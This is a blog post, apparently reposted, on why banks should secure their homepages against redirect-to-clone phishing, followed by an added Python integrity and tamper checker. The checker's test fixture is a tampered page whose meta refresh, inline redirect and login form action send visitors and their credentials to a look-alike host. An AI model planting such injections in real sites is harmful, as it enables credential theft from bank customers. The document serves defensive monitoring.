Most financial institutions invest a large portion of their security budgets in protecting their software-as-a-service (SaaS) applications. They correctly perceive that many cybercriminals look for opportunities at the points where software vendors call into, send data to, or receive data from the institution, and they try to make those exchanges as secure as possible. That said, they often miss a very different, but sometimes equally lucrative, target: their own homepages. An institution's homepage plays a critical role in directing customer traffic, and that is exactly what makes it a prime target for cybercriminals. Yet many financial institutions spend little or nothing on protecting their homepages with adequate security controls. So, what does this type of crime look like, and why is it important to protect your homepage?
Well, imagine that you’re a tourist driving in your brand new Mercedes Benz CL in downtown Manhattan, not certain of your destination. When you reach an intersection, you encounter a police officer directing traffic in the middle of the road. The officer asks you to take a detour. After driving for a few minutes, you hit a construction blockade, and suddenly a man with a gun comes up to the driver’s window from behind your car and forces you out. In the car, you have an unencrypted laptop containing sensitive customer information that is worth millions of dollars on the black market. As the criminal drives away with your car and your customer information, you realize that the police officer at the intersection was a criminal in disguise. You were duped. Game over!
Likewise, a bank or credit union's homepage can be compromised and modified to redirect unsuspecting customers to a look-alike site that collects usernames, passwords, and security-question answers. The attacker can then use those credentials to log into the legitimate site and access account numbers, card histories, and other sensitive (and valuable) information. This is often described as a "man-in-the-middle attack", though strictly it is phishing by way of a compromised site: the attacker's clone stands in for the real site rather than silently relaying traffic between the customer and the bank. The redirect itself can be as small as an injected line of JavaScript, a meta refresh tag, or a changed link or form action, which is why it is so easy to overlook.
Insufficient investment in protecting your homepage can leave your institution exposed to a massive short-term hit to the bottom line and, even worse, long-term damage to its credibility. At a minimum, your homepage should have the following controls:
- An intrusion prevention system (IPS) that detects and blocks attacks in real time
- A firewall that restricts inbound traffic to the ports the web server actually needs
- Host-based logging and monitoring, including integrity monitoring of the served content so that an unauthorized change to the page is noticed quickly rather than by a customer
- A web server hardened according to published benchmarks, such as those from the Center for Internet Security; see http://cisecurity.org/
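As an added example (not from the original post or from Andera), the following Python script shows what the monitoring control above can look like for a static homepage: it compares the served page against a known-good SHA-256 baseline and scans for the injection patterns the redirect-to-clone attack described earlier relies on, namely a meta refresh, an inline JavaScript location change, and scripts, frames or form actions pointing at hosts outside an allowlist. The hostnames, the allowlist and both HTML samples are constructed for illustration.

```python
# Added example (not from the original post): a small integrity/tamper check for a
# static homepage. It compares the page against a known-good SHA-256 baseline and
# scans for the injection patterns a redirect-to-clone attack relies on.
# All hostnames and HTML below are constructed for illustration.
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the real page is allowed to reference. Assumption for this example;
# a deployment would list the institution's own domains and CDN.
ALLOWED_HOSTS = {"www.examplebank.test", "static.examplebank.test"}

# tag/attribute pairs that can load off-site code or send credentials off-site
_URL_ATTRS = (("script", "src"), ("iframe", "src"), ("frame", "src"), ("form", "action"))

# assignments such as  window.location = "..."  or  location.href = '...'
_JS_REDIRECT = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)")


class _TamperScanner(HTMLParser):
    """Collects findings while HTMLParser walks the page."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._in_script = False

    def _check_url(self, where, url):
        host = urlparse(url.strip()).hostname
        # Relative URLs have no host and stay on-site; absolute and
        # scheme-relative ("//evil.test/x") URLs do and are checked.
        if host and host.lower() not in self.allowed:
            self.findings.append(f"{where} -> off-site host {host}")

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", attrs.get("content", ""), re.I)
            if m:
                self._check_url("<meta refresh>", m.group(1))
        for t, a in _URL_ATTRS:
            if tag == t and attrs.get(a):
                self._check_url(f"<{tag} {a}>", attrs[a])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data; look for redirects there.
        if self._in_script:
            for m in _JS_REDIRECT.finditer(data):
                self._check_url("inline script location=", m.group(1))


def page_fingerprint(html):
    """SHA-256 of the exact text served; record this from a known-good copy."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def check_homepage(html, baseline_fingerprint, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of alert strings; an empty list means no tampering found."""
    alerts = []
    if page_fingerprint(html) != baseline_fingerprint:
        alerts.append("content hash differs from baseline")
    scanner = _TamperScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    alerts.extend(scanner.findings)
    return alerts


# Constructed known-good page: own script host, login form posts to the site itself.
GOOD_HTML = """<html><head><title>Example Bank</title>
<script src="https://static.examplebank.test/app.js"></script>
</head><body>
<form action="/login" method="post">
<input name="user"><input name="pass" type="password"></form>
</body></html>"""

# Constructed tampered copy: the attacker injects a meta refresh and an inline
# redirect to a look-alike domain and points the login form at it.
TAMPERED_HTML = """<html><head><title>Example Bank</title>
<meta http-equiv="refresh" content="0; url=https://examp1ebank.test/login">
<script src="https://static.examplebank.test/app.js"></script>
<script>window.location = "https://examp1ebank.test/login";</script>
</head><body>
<form action="https://examp1ebank.test/login" method="post">
<input name="user"><input name="pass" type="password"></form>
</body></html>"""

if __name__ == "__main__":
    baseline = page_fingerprint(GOOD_HTML)
    print("known-good:", check_homepage(GOOD_HTML, baseline))
    for alert in check_homepage(TAMPERED_HTML, baseline):
        print("ALERT:", alert)
```

Run a check like this on a schedule against the page as an external visitor receives it (the served bytes, not the file on disk), so that tampering on a reverse proxy or CDN is caught as well. The raw hash only works for fully static content; for a page with dynamic elements, compare a normalized template instead or rely on the pattern scan alone. Treat the allowlist as a hard boundary: a look-alike domain with its own valid TLS certificate passes every browser check, so the page itself has to be what you trust.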
Protecting your homepage is just as important as protecting your SaaS applications. If you’re a bank or credit union, make sure your IT team is thinking about homepage security too!
Original Post: http://blog.andera.com/posts/2012/october/why-protecting-your-homepage-is-no-laughing-matter.aspx